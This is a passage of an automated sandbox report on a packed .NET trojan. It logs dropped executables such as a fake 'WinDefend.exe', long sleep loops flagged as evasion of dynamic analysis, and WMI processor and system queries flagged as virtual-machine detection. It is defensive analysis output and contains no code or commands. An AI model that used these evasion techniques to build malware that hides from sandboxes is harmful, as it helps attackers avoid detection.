Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592785	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592635	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592507	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592367	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592249	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591789	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591993
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599877
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599738
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599612
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599476
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599360
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599217
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599110
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598982
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598845
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598704
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 6116	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 2999	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loader.exe	Window / User API: threadDelayed 9489
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Window / User API: threadDelayed 8044
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Window / User API: threadDelayed 1770
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 8122
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 1610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9626
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9527
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 9073
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 641
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9149
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 575
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8305
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 606

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe TID: 6556	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 5340	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe TID: 2828	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599524s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598826s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598704s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598556s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598433s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598323s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598090s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597745s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597320s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596948s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596604s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596270s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -595684s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -200000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99866s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99745s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99628s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99389s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99280s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99171s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -98937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99793s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99647s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99210s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -98874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -593075s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592785s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592635s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592507s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592367s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592249s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -591922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -591789s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe TID: 7312	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7328	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7556	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7708	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7716	Thread sleep count: 9489 > 30
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7716	Thread sleep count: 346 > 30
Source: C:\Users\user\AppData\Roaming\Loaader.exe TID: 7552	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loaader.exe TID: 7692	Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7736	Thread sleep count: 8122 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7736	Thread sleep count: 1610 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -598906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -598797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -199062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -198624s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99201s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98978s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98830s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99887s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99521s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -97828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -97670s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -97551s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -97316s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99746s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99421s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99079s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99936s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99742s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99561s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99319s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99180s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99060s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98943s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98804s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -591993s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99876s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99758s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768	Thread sleep count: 9626 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212	Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768	Thread sleep count: 43 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252	Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7504	Thread sleep count: 9073 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599877s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599738s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599612s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599476s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7504	Thread sleep count: 641 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599217s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599110s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -598982s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -598845s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -598704s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99871s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99755s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99633s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99401s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99285s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99168s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99053s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98931s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98815s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99931s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99815s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99684s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99564s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99435s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99314s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98958s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98822s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98706s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98573s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98459s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99960s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99852s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99591s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99351s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99236s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99105s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98872s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99901s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99753s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99615s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680	Thread sleep count: 9149 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep count: 575 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4276	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908	Thread sleep count: 8305 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep count: 606 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5536	Thread sleep time: -922337203685477s >= -30000s

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
